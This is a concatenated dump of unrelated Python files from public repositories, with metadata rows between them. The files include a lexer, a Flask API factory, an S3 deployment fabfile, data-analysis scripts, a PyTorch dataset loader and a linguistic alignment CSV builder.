print(f"Test ({name}) successful")
def __init__(self, testfile):
# read file
with open(testfile+".json", 'r') as t:
data = t.read()
# parse file
test = json.loads(data)
import sys
sys.stdin = RunTest.Keyboard(test['inputs'])
stdout_save = sys.stdout
s = RunTest.Screen()
sys.stdout = s
pscint.PInterpreter().run('\n'.join(test['code']))
sys.stdout = stdout_save
s.compare(test['name'], test['outputs'], s)
if __name__ == "__main__":
RunTest("pseudonaja/tests/Test4") | [
"david.soon@outlook.com"
] | david.soon@outlook.com |
9a30a5346928151a8854ade6050e0044f260903c | 443ac26b4484b30512022ad3d11a1479e2a274c1 | /lexer_rules.py | 76d9e18bfa263517de30c5653b34e6ab66d791e8 | [] | no_license | eduardpii/Lexer_Parser | 5f98ae0a109828c96a50d4d4e519a5dae5f5d4f7 | 2eecb62f91a3ecdba5b742d897f4db9c288f38c8 | refs/heads/master | 2020-03-17T11:21:35.031988 | 2018-05-15T20:12:44 | 2018-05-15T20:12:44 | 133,548,506 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 697 | py | import sys
import re
import ply.lex as lex
tokens = ['NUMBER','PLUS','TIMES','LPAREN','RPAREN','MINUS','DIVIDE' ]
t_ignore = ' \t\n'
t_PLUS = r"\+"
t_TIMES = r"\*"
t_LPAREN = r"\("
t_RPAREN = r"\)"
t_MINUS = r"-"
t_DIVIDE = r"/"
def t_NUMBER(token):
r"[1-9][0-9]*"
token.value = int(token.value)
return token
t_ignore_WHITESPACES = r"[ \t]+"
def t_NEWLINE(token):
r"\n+"
token.lexer.lineno += len(token.value)
def t_error(token):
message = "Token desconocido:"
message = "\ntype:" + token.type
message += "\nvalue:" + str(token.value)
message += "\nline:" + str(token.lineno)
message += "\nposition:" + str(token.lexpos)
raise Exception(message)
| [
"noreply@github.com"
] | noreply@github.com |
1e3d9cea7ebe335cd86c44fb107dd4becb2b36f5 | 34e07a5a711c52c4b0aabd353ec0bf06e93edfa7 | /feature_importance.py | 7a51ff2481d6fd8b081d410038b07c0c76613c0d | [] | no_license | Tools-Demo/PR_CodeSmells | bc769c2ea1b3de6c37da8990c4b65b8efd557255 | 81c8f1574fb66c44e8f68da652c2febb61e5fd48 | refs/heads/main | 2023-07-19T23:41:07.128083 | 2023-07-12T07:46:25 | 2023-07-12T07:46:25 | 390,305,788 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,653 | py | # Calculate Feature importance
# random forest for feature importance on a classification problem
import pandas as pd
from sklearn.datasets import make_regression
from sklearn.ensemble import RandomForestClassifier
from matplotlib import pyplot
import seaborn as sns
import matplotlib.pyplot as plt
df = pd.read_csv("Dataset/25_projects_PRs.csv", sep=',', encoding='utf-8')
df['src_churn'] = df['Additions'] + df['Deletions']
df['num_comments'] = df['Review_Comments_Count'] + df['Comments_Count']
df['is_God_Class'] = df['GodClass'].apply(lambda x: 1 if x>0 else 0)
df['is_Data_Class'] = df['DataClass'].apply(lambda x: 1 if x>0 else 0)
df['is_Long_Method'] = df['ExcessiveMethodLength'].apply(lambda x: 1 if x>0 else 0)
df['is_Long_Parameter_List'] = df['ExcessiveParameterList'].apply(lambda x: 1 if x>0 else 0)
df.loc[(df['GodClass'] > 0) | (df['DataClass'] > 0) | (df['ExcessiveMethodLength'] > 0) |
(df['ExcessiveParameterList'] > 0), 'is_smelly'] = 1
df.loc[df['is_smelly'].isnull(), 'is_smelly'] = 0
# Previous work features
accept_baseline = ['src_churn', 'Commits_PR', 'Files_Changed', 'num_comments','Followers','Participants_Count',
'Team_Size', 'File_Touched_Average', 'Commits_Average', 'Prev_PRs', 'is_smelly', #'Project_Size',
'User_Accept_Rate', 'PR_Time_Created_At', 'PR_Date_Closed_At', 'PR_Time_Closed_At',
'PR_Date_Created_At', 'Project_Name', 'PR_accept']
df = df[accept_baseline]
target = 'is_smelly'
predictors = [x for x in df.columns if x not in [target, 'PR_Date_Created_At', 'PR_Time_Created_At', 'PR_Date_Closed_At',
'PR_Time_Closed_At', 'Project_Name', 'PR_accept']]
df = df.dropna()
X = df[predictors]
y = df[target]
# define the model
model = RandomForestClassifier()
# fit the model
model.fit(X, y)
# get importance
importance = model.feature_importances_
#do code to support model
#"data" is the X dataframe and model is the SKlearn object
feats = {} # a dict to hold feature_name: feature_importance
for feature, importance in zip(df.columns, model.feature_importances_):
feats[feature] = importance #add the name/value pair
importances = pd.DataFrame.from_dict(feats, orient='index').rename(columns={0: 'Feature_importance'})
importances = importances.head(-1)
sns.set(rc={"figure.figsize":(20, 10)}) #width=3, #height=4
sns.set(font_scale=2) # crazy big
plt.xticks(rotation=45)
sns.barplot(data=importances.sort_values(by='Feature_importance'), x=importances.index, y="Feature_importance", palette=sns.color_palette(["#477ba8"])) | [
"noreply@github.com"
] | noreply@github.com |
27be5fc47a6b530183918059c4a5da41219fe0ae | fb382bb253b1d3ef50009421d2fe266824d10a84 | /peach/handlers/flask/api.py | c981210b320d105119d7df9d5cd12d61661200e5 | [
"MIT"
] | permissive | craigpmc/peach | e29f260fa03cf35214f5a7347846e25958c72d54 | 503a0b00ed1562e8d619c5c6f4ca5be6c1d17339 | refs/heads/master | 2020-03-26T06:56:12.993223 | 2017-05-13T23:01:54 | 2017-05-13T23:01:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,762 | py | import flask_restful
from flask import Blueprint, jsonify, make_response
from peach.rest.base_api import ApiFactory, ApiException
class FlaskApiFactory(ApiFactory):
def _build_api(self, app, api_def):
api_blueprint = Blueprint(api_def.name, api_def.name, url_prefix=api_def.prefix)
api_blueprint.conf = api_def.conf
rest_api = FlaskRestApi(app=api_blueprint,
name=api_def.name,
version=api_def.version,
media_type=api_def.mediatype)
for name, endpoint in api_def.endpoints.items():
rest_api.add_resource(endpoint.handler,
*endpoint.urls,
endpoint=name,
resource_class_kwargs=endpoint.params)
return api_blueprint
class FlaskRestApi(flask_restful.Api):
MEDIA_TYPE = 'application/json'
DEFAULT_HEADER = {'Content-Type': MEDIA_TYPE}
def __init__(self,
app,
name=None,
version=None,
media_type=None,
**kwargs):
super().__init__(app=app, default_mediatype=media_type or self.MEDIA_TYPE, **kwargs)
@app.route('/')
def main():
return jsonify({
'name': name or 'Peach Rest Api',
'version': version or '0.0.0',
})
def handle_error(self, e):
if isinstance(e, ApiException):
error_response = make_response(jsonify(e.data), e.status)
error_response = '{}' if e.status == 200 else error_response
else:
error_response = super().handle_error(e)
return error_response
| [
"seba@localhost.localdomain"
] | seba@localhost.localdomain |
20defbd45e630ebdc24a72142a0151dac547f4f5 | df97a91911f59afea36aef2269e5842b2fedd170 | /fabfile.py | 4f2c0c5198d5ab4b254fa84df26c0ff71f532881 | [] | no_license | TheLens/demolitions | 9944003abdbadaacce9b5310a65f44b7054a070c | fc1fffc9ea61205b008eb4f04f8d9699aaf1ef27 | refs/heads/master | 2021-01-16T22:28:46.106695 | 2015-09-04T16:34:14 | 2015-09-04T16:34:14 | 39,971,839 | 2 | 0 | null | null | null | null | UTF-8 | Python | true | false | 6,406 | py | # -*- coding: utf-8 -*-
'''
Methods for deploying to S3.
'''
from fabric.api import local
from scripts import PROJECT_DIR
def minify():
'''Minify static assets.'''
minify_js()
minify_css()
def minify_js():
'''Minify JS files.'''
js_dir = '%s/demolitions/static/js' % PROJECT_DIR
local(
'shopt -s nullglob\n' +
'for f in %s/*.js; do\n' % js_dir +
' if [[ $f == *".min."* ]]; then\n' +
' continue\n' +
' fi\n' +
' filename="${f%.*}"\n' +
' yuicompressor $f -o $filename.min.js\n' +
'done'
)
def minify_css():
'''Minify CSS files.'''
css_dir = '%s/demolitions/static/css' % PROJECT_DIR
skin_dir = '%s/demolitions/static/default-skin' % PROJECT_DIR
local(
'shopt -s nullglob\n' +
'for f in %s/*.css; do\n' % css_dir +
' if [[ $f == *".min."* ]]; then\n' +
' continue\n' +
' fi\n' +
' filename="${f%.*}"\n' +
' yuicompressor $f -o $filename.min.css\n' +
'done'
)
local(
'shopt -s nullglob\n' +
'for f in %s/*.css; do\n' % skin_dir +
' if [[ $f == *".min."* ]]; then\n' +
' continue\n' +
' fi\n' +
' filename="${f%.*}"\n' +
' yuicompressor $f -o $filename.min.css\n' +
'done'
)
def gzip():
'''gzip static assets.'''
gzip_html()
gzip_js()
gzip_json()
gzip_css()
def gzip_html():
'''gzip HTML files.'''
html_dir = '%s/demolitions/static/html' % PROJECT_DIR
temp_dir = '%s/html_temp' % html_dir
local('mkdir %s' % temp_dir)
local(
'shopt -s nullglob\n' +
'for f in %s/*.html; do\n' % html_dir +
' filename=$(basename $f)\n' +
' gzip -9 < $f > $f.gz;\n' +
' mv $f.gz %s/$filename\n' % temp_dir +
'done')
def gzip_js():
'''gzip JavaScript files.'''
js_dir = '%s/demolitions/static/js' % PROJECT_DIR
temp_dir = '%s/js_temp' % js_dir
local('mkdir %s' % temp_dir)
local(
'shopt -s nullglob\n' +
'for f in %s/*.min.js; do\n' % js_dir +
' filename=$(basename $f)\n' +
' gzip -9 < $f > $f.gz;\n' +
' mv $f.gz %s/$filename\n' % temp_dir +
'done')
def gzip_json():
# JSON
app_data_dir = '%s/data/app' % PROJECT_DIR
temp_dir = '%s/json_temp' % app_data_dir
local('mkdir %s' % temp_dir)
local(
'shopt -s nullglob\n' +
'for f in %s/*.json; do\n' % app_data_dir +
' filename=$(basename $f)\n' +
' gzip -9 < $f > $f.gz;\n' +
' mv $f.gz %s/$filename\n' % temp_dir +
'done')
def gzip_css():
'''gzip CSS files.'''
css_dir = '%s/demolitions/static/css' % PROJECT_DIR
skin_dir = '%s/demolitions/static/default-skin' % PROJECT_DIR
temp_css_dir = '%s/css_temp' % css_dir
temp_skin_dir = '%s/skin_temp' % skin_dir
local('mkdir %s' % temp_css_dir)
local('mkdir %s' % temp_skin_dir)
local(
'shopt -s nullglob\n' +
'for f in %s/*.min.css; do\n' % css_dir +
' filename=$(basename $f)\n' +
' gzip -9 < $f > $f.gz;\n' +
' mv $f.gz %s/$filename\n' % temp_css_dir +
'done')
local(
'shopt -s nullglob\n' +
'for f in %s/*.min.css; do\n' % skin_dir +
' filename=$(basename $f)\n' +
' gzip -9 < $f > $f.gz;\n' +
' mv $f.gz %s/$filename\n' % temp_skin_dir +
'done')
def clean_gzip():
html_dir = '%s/demolitions/static/html' % PROJECT_DIR
css_dir = '%s/demolitions/static/css' % PROJECT_DIR
skin_dir = '%s/demolitions/static/default-skin' % PROJECT_DIR
js_dir = '%s/demolitions/static/js' % PROJECT_DIR
app_data_dir = '%s/data/app' % PROJECT_DIR
local('rm -rf %s/html_temp' % html_dir)
local('rm -rf %s/js_temp' % js_dir)
local('rm -rf %s/json_temp' % app_data_dir)
local('rm -rf %s/css_temp' % css_dir)
local('rm -rf %s/skin_temp' % skin_dir)
def s3_images():
'''Images only.'''
local(
'aws s3 sync %s/demolitions/static/images/ ' % PROJECT_DIR +
's3://projects.thelensnola.org/demolitions/images/ ' +
'--acl "public-read" '
'--cache-control "max-age=86400"')
def s3_static():
'''Static dir.'''
js_dir = '%s/demolitions/static/js' % PROJECT_DIR
css_dir = '%s/demolitions/static/css' % PROJECT_DIR
skin_dir = '%s/demolitions/static/default-skin' % PROJECT_DIR
app_data_dir = '%s/data/app' % PROJECT_DIR
# HTML
local(
'aws s3 sync %s/demolitions/static/html/html_temp/ ' % PROJECT_DIR +
's3://projects.thelensnola.org/demolitions/ ' +
'--acl "public-read" ' +
'--exclude=".DS_Store" ' +
'--content-encoding gzip ' +
'--content-type "text/html; charset=UTF-8" ' +
'--cache-control "max-age=86400"')
# JS
local(
'aws s3 sync %s/js_temp/ ' % js_dir +
's3://projects.thelensnola.org/demolitions/js/ ' +
'--acl "public-read" ' +
'--exclude=".DS_Store" ' +
'--content-encoding gzip ' +
'--cache-control "max-age=86400"')
# CSS
local(
'aws s3 sync %s/css_temp/ ' % css_dir +
's3://projects.thelensnola.org/demolitions/css/ ' +
'--acl "public-read" ' +
'--exclude=".DS_Store" ' +
'--content-encoding gzip ' +
'--cache-control "max-age=86400"')
# PhotoSwipe
local(
'aws s3 sync %s/ ' % skin_dir +
's3://projects.thelensnola.org/demolitions/default-skin/ ' +
'--acl "public-read" ' +
'--exclude=".DS_Store" ' +
'--cache-control "max-age=86400"')
local(
'aws s3 sync %s/skin_temp/ ' % skin_dir +
's3://projects.thelensnola.org/demolitions/default-skin/ ' +
'--acl "public-read" ' +
'--exclude=".DS_Store" ' +
'--content-encoding gzip ' +
'--cache-control "max-age=86400"')
# Data
local(
'aws s3 sync %s/json_temp/ ' % app_data_dir +
's3://projects.thelensnola.org/demolitions/data/ ' +
'--acl "public-read" ' +
'--exclude=".DS_Store" ' +
'--content-encoding gzip ' +
'--cache-control "max-age=86400"')
def s3():
'''Push everything to S3.'''
clean_gzip()
minify()
gzip()
s3_static()
s3_images()
clean_gzip()
| [
"thomasjthoren@gmail.com"
] | thomasjthoren@gmail.com |
6176d91067bf9468cfb74bf2abd4928f761a1d47 | b635e833bd8078b567551c9df97012860ef23c4a | /src/boxplots.py | ea095fd4766f7b3097f621015dbf0e455954c544 | [] | no_license | pebonte/AAindex | f94a58c8dc2dfff3d67e8a428f67c32e69571aa8 | 8aaed01f73f63dab49ae99a5f5a2a02fb0cf5729 | refs/heads/master | 2020-04-15T05:09:30.108528 | 2019-01-11T08:54:01 | 2019-01-11T08:54:01 | 164,410,963 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,778 | py | #! /usr/bin/env python3
import glob
from aaindex_processing import (retrieve_values_aaindex,
retrieve_loop_data,
make_dataframe_from_aaindex_data,
make_aaindex_boxplots_by_family)
'''
Script that create boxplots and produce data (.csv files) from alignments and aaindex values.
REQUIREMENT : Internet connection
'''
AMINO_ACID_LIST = []
aa_list = 'ARNDCQEGHILKMFPSTWYV'
for aa in aa_list:
AMINO_ACID_LIST.append(aa)
if __name__ == '__main__':
# Retrieving alignments data
data = retrieve_loop_data('../data/alignment_plain/', '*.plain')
alignment_data_dict, remaining = data
# Files that won't be run by the script
files_remaining_string = 'List of files with more than 6 cysteines : '
for file_remaining in remaining:
files_remaining_string += file_remaining + ', '
print(files_remaining_string)
# AAindex that will be retrieved
list_aaindex_ids = ['BHAR880101', 'CASG920101', 'CHAM830107',
'CHOP780201', 'CHOP780202', 'CHOP780203',
'CIDH920105', 'DAYM780201', 'EISD860102',
'FASG760101', 'FAUJ880111', 'FAUJ880111',
'FAUJ880112', 'GOLD730101', 'GRAR740102',
'JANJ780101', 'JANJ780102', 'JANJ780103',
'JOND750101', 'JOND920102', 'KLEP840101',
'KRIW790101', 'KRIW790102', 'KYTJ820101',
'MITS020101', 'PONP930101', 'RACS820114',
'RADA880108', 'TAKK010101', 'TAKK010101',
'VINM940101', 'WARP780101', 'WOLR790101',
'ZIMJ680101']
#list_aaindex_ids = ['GRAR740102']
# Retrieving AAindex data
aaindex_data = retrieve_values_aaindex(list_aaindex_ids)
web_aaindex_data_dict, aaindex_names_data = aaindex_data
# Group both data into a dataframe
df_data = make_dataframe_from_aaindex_data(web_aaindex_data_dict,
aaindex_names_data,
alignment_data_dict,
list_aaindex_ids)
data, dataframe, coding_family_name_dict, list_aaindex_ids = df_data
# Boxplots and csv files generation
for family in list(sorted(list(alignment_data_dict['number_of_seq'].keys()))):
make_aaindex_boxplots_by_family(family,
list_aaindex_ids,
dataframe,
coding_family_name_dict,
alignment_data_dict,
aaindex_names_data)
| [
"pierreemmanuel.bonte@gmail.com"
] | pierreemmanuel.bonte@gmail.com |
dec104f1556217e5f8b811392f81bac47904cebd | 1ffdf1e2a3a32bf617d9f11d27c9eac129161b19 | /Dataset_second.py | acea8db9cc5c0114d92e4286a7c0c9beceb1ec44 | [] | no_license | cjj1234/Document_layout_analysis | 8f7d27fc3a8d82d78c4cfd9abcd162fd5ee97e3a | a35231516bc17e047c670a0ba514a0bb02ac43d8 | refs/heads/master | 2021-01-08T20:03:43.582642 | 2020-02-16T09:50:16 | 2020-02-16T09:50:16 | 242,129,323 | 1 | 0 | null | 2020-02-21T12:01:06 | 2020-02-21T12:01:05 | null | UTF-8 | Python | false | false | 3,544 | py | import os
import cv2
import numpy as np
from augmentation import Augmentation
from torch.utils.data import Dataset
class ModelDataset(Dataset):
def __init__(self, base_path='./Data', train=True):
super(ModelDataset, self).__init__()
# parameters
# TODO add config file
self.BLUR = 0.0
self.FLIP = 0.0
self.COLOR = 1.0
self.GRAY = 0.2
self.SIZE = (400, 600)
self.MASK_SIZE = (38, 63)
self.train = train
# augumentation
self.augumentation = Augmentation(self.BLUR, self.FLIP, self.COLOR)
# build path
self.base_path = base_path
self.image_path = os.path.join(base_path, 'Image')
self.anno_path = os.path.join(base_path, 'Annotations')
# build list
self.image_list = self.file_name(self.image_path, '.jpg')
self.image_list.sort()
if self.train:
self.mask_list = self.file_name(self.anno_path, '.jpg')
self.mask_list.sort()
self.csv_list = self.file_name(self.anno_path, '.csv')
self.csv_list.sort()
# check all have label
for i in self.image_list[:]:
if i not in self.mask_list:
print("{} don't have annotation!".format(i))
self.image_list.remove(i)
# number of data
self.num = len(self.image_list)
def __getitem__(self, index):
# init
target_mask = None
# make target choice
# target = np.random.choice(self.image_list)
target = self.image_list[index]
# read data
target_image = cv2.imread(os.path.join(self.image_path, target))
if self.train:
# TODO add csv reader
target_mask = cv2.imread(os.path.join(self.anno_path, target))
# creat label
gray = self.GRAY and self.GRAY > np.random.random()
target_image, target_mask = self.augumentation(target_image,
target_mask,
self.SIZE,
gray=gray)
# compile
target_mask = cv2.resize(target_mask, self.MASK_SIZE)
target_mask = np.where(target_mask, 1, 0)
blank_mask = np.where(np.sum(target_mask, axis=2)==0, 1, 0)[:,:,np.newaxis]
target_mask = np.dstack((blank_mask, target_mask))
target_mask = target_mask.transpose((2, 1, 0)).astype(np.float32)
else:
target_image = cv2.resize(target_image, self.SIZE)
target_image = target_image.transpose((2, 1, 0)).astype(np.float32)
return {
'target_image': target_image,
'target_mask' : target_mask,
}
def __len__(self):
return self.num
def file_name(self, file_dir, target='.jpg'):
File_Name=[]
for files in os.listdir(file_dir):
if os.path.splitext(files)[1] == target:
File_Name.append(files)
return File_Name
if __name__ == "__main__":
import torch
# 准备数据集
train_set = ModelDataset(base_path='./Data', train=True)
# 建立dataloader
train_loader = torch.utils.data.DataLoader(
dataset=train_set,
batch_size=10,
num_workers=1,
shuffle=True)
for i in train_loader:
print(i)
| [
"jameslimers@gmail.com"
] | jameslimers@gmail.com |
5b9cb8a7ad424b8d939c86755a3ddeb0eb9efb65 | 209d360630262aaf2a8e600fe7efb6107fbba4f2 | /python-app-basic/connect2redis.py | b5cc60a8f4c7c407ef43e3def7e4e9823acac2d4 | [] | no_license | hemantdindi/redis-sentinel-docker-swarm | 1f1bdc9797b56a4f9f777d6ffb677cd714cdfea2 | bc7f5b9a5ebc9893223ead41770495b3c27e95f4 | refs/heads/master | 2022-10-21T20:21:10.736119 | 2020-06-13T12:46:53 | 2020-06-13T12:46:53 | 271,963,964 | 5 | 3 | null | null | null | null | UTF-8 | Python | false | false | 503 | py | from redis.sentinel import Sentinel
import redis
#sentinel = Sentinel([('node01', 26379),('node02',26379),('node03',26379)],password='F9HaeCD6df24nLpn',socket_timeout=0.5)
sentinel = Sentinel([('redis-sentinel', 26379)],password='7cBEcwf6mV36Rx3S',socket_timeout=0.5)
host, port = sentinel.discover_master('redis-cache')
print(host)
print(port)
redis_client = redis.StrictRedis(host=host,port=port,password='7cBEcwf6mV36Rx3S')
redis_client.set('key', 'value')
value=redis_client.get('key')
print(value)
| [
"hemantdindi@users.noreply.github.com"
] | hemantdindi@users.noreply.github.com |
5a28b6bebb2edcf6d7af16184dc4db6fd1d2ef8e | 66e9207731dad5cefcf54ddad80607c269409d7b | /csv_creation1/new/csv_format.py | ddde3fdedbe59f1bc3791478426ecdef48bc1c69 | [] | no_license | PawarKishori/Alignment1 | 2949df14734680264e0597c764086060e61ae704 | d824957037b7a0c585d9751485e485e3b9f20679 | refs/heads/master | 2020-05-24T16:36:22.745901 | 2020-01-21T07:41:03 | 2020-01-21T07:41:03 | 187,359,528 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,345 | py | import csv
import re
log=open('file_missing_log','a')
flag=0
flag4=0
flag5=0
flag6=0
flag7=0
flag8=0
flag9=0
flagg=0
flag10=0
flag11=0
flag12=0
flag13=0
try:
f=open("word.dat",'r').readlines()
n=len(f)-1
except:
flag=1
log.write("E_id_word_dictionary.dat not found\n")
try:
f4=open("parser_alignment.dat",'r').readlines()
except:
flag4=1
log.write("parser_alignment.dat not found\n")
try:
f5=open("word_alignment_tmp.dat",'r').readlines()
except:
flag5=1
log.write("word_alignment_tmp.dat not found\n")
try:
f6=open("word_alignment.dat",'r').readlines()
except:
flag6=1
log.write("word_alignment.dat not found\n")
try:
f7=open("corrected_pth.dat",'r').readlines()
except:
flag7=1
log.write("corrected_pth.dat not found\n")
try:
f8=open("corpus_specific_dic_facts_for_one_sent.dat",'r').readlines()
except:
flag8=1
log.write("corpus_specific_dic_facts_for_one_sent.dat not found\n")
try:
f9=open("R_layer_final_facts.dat",'r').readlines()
except:
flag9=1
log.write("R_layer_final_facts.dat not found\n")
try:
g=open("manual_lwg.dat",'r').readlines()
glen=len(g)
except:
flagg=1
log.write("manual_lwg.dat not found\n")
try:
f10=open("H_wordid-word_mapping.dat","r").readlines()
except:
flag10=1
log.write("H_wordid-word_mapping.dat not found\n")
try:
f11=open("id_Apertium_output.dat", "r").readlines()
except:
flag11=1
log.write("id_Apertium_output.dat not found\n")
try:
f12=open("vibhakti", "r").read()
except:
flag12=1
log.write("vibhakti file not found\n")
try:
f13=open("GNP_agmt_info.dat", "r").readlines()
except:
flag13=1
f13=open("GNP_agmt_info.dat not found")
list_A=['A']
list_K=['K']
list_L=['L']
list_M=['M']
list_N=['N']
list_O=['O']
list_P=['P']
list_P1=['P1']
list_DICT=['DICT']
list_R=['R']
list_K_partial=['K_par']
for i in range(n):
list_A.append("_")
list_K.append("_")
list_L.append("_")
list_M.append("_")
list_N.append("_")
list_O.append("_")
list_P.append("_")
list_P1.append("_")
list_DICT.append("_")
list_R.append("_")
list_K_partial.append("_")
if(flag==0):
for i in range(1,n+1):
word=re.split(r'\s+',f[i-1].rstrip())
list_A[i]=word[1] #A_Layer
######## Displaying K layer and K layer partial . Added by Roja
m_dic = {}
k_dic = {}
k_par_dic = {}
##===================
def add_data_in_dic(dic, key, val):
if key not in dic:
dic[key] = val
else:
dic[key] = dic[key] + '/' + val
##===================
if(flag10==0):
for i in f10:
hword=re.split(r'\s+',i[:-2])
add_data_in_dic(m_dic, hword[2], hword[1])
##===================
def check_for_consecutive_ids(ids, id2):
if '/' in ids:
ids_lst = ids.split('/')
elif ' ' in ids:
ids_lst = ids.split('/')
else:
if int(ids) + 1 == int(id2) :
return True
for each in ids_lst:
if ' ' in each:
ides = each.split()
if int(id2) == int(ides[-1]) + 1:
# print 'True' + ' ' + ' '.join(ids_lst)
return 'True' + ' ' + ' '.join(ids_lst)
else:
if int(id2) == int(each) + 1:
out = 'True' + ' ' + each
return out
##===================
#print in k_dic
def store_data_in_k_dic(key, inp, val1, val2):
if inp == True:
k_dic[key] = val1 + ' ' + val2
elif 'True' in inp.split():
k_dic[key] = ' '.join(inp.split()[1:]) + ' ' + val2
##===================
if(flag11==0):
for i in f11:
ap_out=re.split(r'\s+', i[:-2].strip())
mngs = []
try:
if(len(ap_out) > 2):
for each in ap_out[2:]:
k_mng = re.sub(r'[_-]', ' ', each) #parvawa_pafkwi
l = k_mng.split()
for item in l:
mngs.append(item)
for wrd in mngs:
wrd_id = int(ap_out[1]) #to get eng_wrd_id in id_Apertium_output
#print wrd, wrd_id, k_dic.keys()
if wrd_id not in k_dic.keys() and wrd in m_dic.keys():
k_dic[wrd_id] = str(m_dic[wrd])
# print '$$$', wrd, wrd_id, k_dic[wrd_id], m_dic[wrd]
elif wrd_id in k_dic.keys() and wrd in m_dic.keys():
if ' ' not in k_dic[wrd_id] and '/' not in str(m_dic[wrd]):
o = check_for_consecutive_ids(k_dic[wrd_id], m_dic[wrd])
store_data_in_k_dic(wrd_id, o, k_dic[wrd_id], str(m_dic[wrd]))
elif '/' not in str(m_dic[wrd]):
# print '^^', k_dic[wrd_id], m_dic[wrd], wrd
o = check_for_consecutive_ids(k_dic[wrd_id], m_dic[wrd])
store_data_in_k_dic(wrd_id, o, k_dic[wrd_id], str(m_dic[wrd]))
else:
# print k_dic[wrd_id], m_dic[wrd], wrd
if '/' not in k_dic[wrd_id]:
a = k_dic[wrd_id].split()
if str(int(a[-1])+1) in m_dic[wrd].split('/'):
o = check_for_consecutive_ids(k_dic[wrd_id], int(a[-1])+1)
store_data_in_k_dic(wrd_id, o, k_dic[wrd_id], str(int(a[-1])+1))
a = k_dic[wrd_id].split('/') #Ex: 2.9, sWAna se
for each in a:
if str(int(each)+1) in m_dic[wrd].split('/'):
o = check_for_consecutive_ids(each, int(each)+1)
store_data_in_k_dic(wrd_id, o, each, str(int(each)+1))
except:
# else:
log.write('Check this mng::,')
log.write(str(ap_out[2:]))
print('1111', ap_out[2:])
##===================
#Return key for a known value:
def return_key(val, dic):
for key in dic:
if val == dic[key]:
return key
elif val in dic[key].split('/'):
return key
##===================
#return manual mngs:
def return_mng(ids, dic):
mng = []
if '/' in ids:
# print '$$$Ids are ',ids
a = re.sub('/', ' ', ids)
for each in ids:
m = return_key(each, dic)
# print each, m , dic.values()
if m!= None:
mng.append(m)
return ' '.join(mng)
##===================
def check_for_vib(a_mng, m_mng, vib):
if m_mng not in vib:
return True
##===================
#To handle hE/hEM etc. using tam info. If this is part of tam then restricting them to display in partial layer.
tam_dic = {}
restricted_wrds = ['hE', 'hEM', 'WA', 'WIM', 'WI']
if(flag13==0):
for line in f13:
if line.startswith('(pada_info'):
t = re.split(r'\)', line.strip())
key = t[0].split()[-1]
tam_info = t[8].split('_')[-1]
if tam_info in restricted_wrds:
tam_dic[int(key)] = 'yes'
#print tam_dic.keys()
##===================
new_k_dic = {}
for i in f11:
ap_out=re.split(r'\s+', i[:-2].strip())
if(len(ap_out) > 2):
if int(ap_out[1]) in k_dic.keys():
ids = k_dic[int(ap_out[1])].split()
mngs = []
for each in ap_out[2:]:
k_mng = re.sub(r'_', ' ', each)
mngs.append(k_mng)
anu_mng = ' '.join(mngs)
man_mng = return_mng(ids, m_dic)
#print(anu_mng)
if anu_mng == man_mng:
new_k_dic[int(ap_out[1])] = ' '.join(ids)
print('Exact', anu_mng)
else:
out = check_for_vib(anu_mng, man_mng, f12)
if out == True:
if man_mng not in restricted_wrds:
print('partial', anu_mng, man_mng, ' '.join(ids), int(ap_out[1]))
k_par_dic[int(ap_out[1])] = ' '.join(ids)
elif man_mng in restricted_wrds and int(ap_out[1]) not in tam_dic.keys():
print man_mng, int(ap_out[1])
print('partial', anu_mng, man_mng, ' '.join(ids), int(ap_out[1]))
k_par_dic[int(ap_out[1])] = ' '.join(ids)
else:
k_par_dic[int(ap_out[1])] = '-'
##====================
#Store data in list_K
for i in range(1, n+1):
if i in new_k_dic.keys():
list_K[i] = new_k_dic[i]
else:
list_K[i] = '-'
##===================
#Store data in list_K_partial:
for i in range(1, n+1):
if i in k_par_dic.keys():
list_K_partial[i] = k_par_dic[i]
else:
list_K_partial[i] = '-'
##===================
print('Kth Layer info::\n', list_K)
print('Partial K layer info::\n', list_K_partial)
m_dic = {}
k_dic = {}
new_k_dic = {}
k_par_dic = {}
############# Added by Roja Ended
if(flag4==0):
n4=len(f4)
for i in range(n4):#N_Layer
f4[i]=f4[i].rstrip()[:-1]
f4[i]=f4[i][1:]
column=re.split(r'\)?\s\(',f4[i])
column[4]=column[4][:-1]
a_id=re.split(r'\s',column[1])
man_id=re.split(r'\s',column[2])
res=""
flagg=0
try:
g=open("manual_lwg.dat",'r').readlines()
except:
flagg=1
log.write("manual_lwg.dat not found")
glen=len(g)
for j in range(glen):
g[j]=g[j].rstrip()[:-1]
g[j]=g[j][1:]
new=re.split(r'\)?\s\(',g[j])
new[4]=new[4][:-1]
h_id=re.split(r'\s',new[1])
if man_id[1]==h_id[1]:
res=new[10]
break
res=res[:-1]
res=" ".join(res.split()[1:])
if res=="":
res=man_id[1]
log.write("Issue with parser_alignment.dat: man_id " + man_id[1]+" not found in manual_lwg.dat")
list_N[int(a_id[1])]=res
flagg=0
try:
g=open("manual_lwg.dat",'r').readlines()
glen=len(g)
except:
flagg=1
log.write("manual_lwg.dat not found")
if(flag5==0):
n5=len(f5)
for i in range(n5): #O_Layer
res=re.split(r'\s+',f5[i].rstrip())
number1=res[4][:-1] #Man_ID
number2=res[2][:-1] #ANu_ID
temp=0
for j in range(glen):
res1=re.split(r'\s+',g[j].rstrip())
number3=res1[2][:-1]
#print(number3)
if(int(number1)==int(number3)):
temp=1
str1=[]
m=len(res1)
for k in range(1,m):
k=k*-1
if(res1[k]=='(group_ids'):
break
else:
y=k*-1
if(y==1):
res1[k]=res1[k][:-2]
str1.append(res1[k])
str1.reverse()
lenstr=len(str1)
a=""
for m in range(lenstr):
a=a+str1[m]+" "
#print(a)
for l in range(n+1):
if(int(l)==int(number2)):
a=a[:-1]
list_O[l]=a
#print(list_O[l])
if(temp==0):
for l in range(n+1):
if(int(l)==int(number2)):
list_O[l]=number1
print(list_O)
if(flag6==0):#P_Layer
n6=len(f6)
for i in range(n6):
res1=f6[i][1:]
res2=res1[:-2]
res3=re.split(r'-',res2)
length=len(res3)
anu_id=re.split(r'\s+',res3[4])[1]
str1=""
str2=""
if(length>6):
for j in range(5,length):
if(res3[j]!=' '):
str1=str1+res3[j]+"-"
str2=str1[:-1]
elif(length==6):
str2=res3[5]
str3=str2[1:]
myre=re.split(r'\s+',str3)
try:
myre.remove("-")
except:
print(" ")
